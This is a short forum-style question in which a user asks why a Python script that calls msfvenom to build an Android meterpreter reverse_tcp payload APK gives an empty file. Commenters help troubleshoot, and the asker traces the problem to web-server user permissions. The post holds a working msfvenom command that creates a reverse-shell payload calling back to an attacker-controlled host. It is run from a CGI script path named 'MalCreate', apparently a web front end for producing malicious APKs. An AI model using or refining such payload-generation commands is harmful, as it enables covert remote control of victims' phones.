# metasploit payload for android creates an empty apk file

Tags: android, python, ruby, metasploit

I've been trying to make a payload for android and all i get is an empty apk file. I have a python code which executes the command. The same command works when executed on the terminal. What could be the problem?

```
os.system('msfvenom -p android/meterpreter/reverse_tcp LHOST=ip_address LPORT=port_number R > file.apk')
```

I also tried executing the command through a shell script , same issue

```
shellscript = subprocess.Popen(['/usr/lib/cgi-bin/MalCreate/createAPK.sh'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE).
```

Comment: an empty APK sounds like a problem with your build toolchain, can you show how you do that?

Comment: The APK is created from this line `os.system('msfvenom -p android/meterpreter/reverse_tcp LHOST=ip_address LPORT=port R > file.apk')`.

Comment: I also realised that the apk file is owned by www-data and that user does not have root permissions. I figured that's why the file is empty